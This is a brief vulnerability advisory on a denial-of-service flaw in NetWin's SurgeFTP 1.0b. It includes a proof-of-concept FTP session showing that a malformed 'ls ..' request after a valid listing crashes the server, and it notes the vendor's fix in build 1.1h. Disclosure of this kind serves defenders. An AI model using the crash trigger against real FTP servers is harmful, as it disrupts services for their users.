VERSION AFFECTED
- NetWin’s SurgeFTP 1.0b
DESCRIPTION
A Denial of Service (DoS) condition exists in
NetWin’s SurgeFTP 1.0b that lets any user with local access to the SurgeFTP
host crash the server. Issuing a malformed request for a directory listing such
as “ls ..” after successfully initializing a previous valid request for a
listing might crash the server.
DEMONSTRATION
SNS Research provided the following proof-of-concept scenario:
# ftp localhost
Connected to testbak
220 SurgeFTP testbak (Version 1.0b)
User (testbak:(none)): anonymous
331 Password required for anonymous.
Password:
230- Alias Real path Access
230- / /home read
230 User anonymous logged in.
ftp> ls /
200 Port command successful.
150 Opening ASCII mode data connection for file list. (/)
226 Transfer complete.
ftp> ls ..
200 Port command successful.
150 Opening ASCII mode data connection for file list. (/..)
-> ftp get:Connection reset by peer
(..)
VENDOR RESPONSE
The vendor, NetWin, has released build v1.1h that corrects this issue. It is available at ftp://ftp.netwinsite.com/pub/surgeftp/surgeftp11h_nt.exe
CREDIT
Discovered by SNS
Research.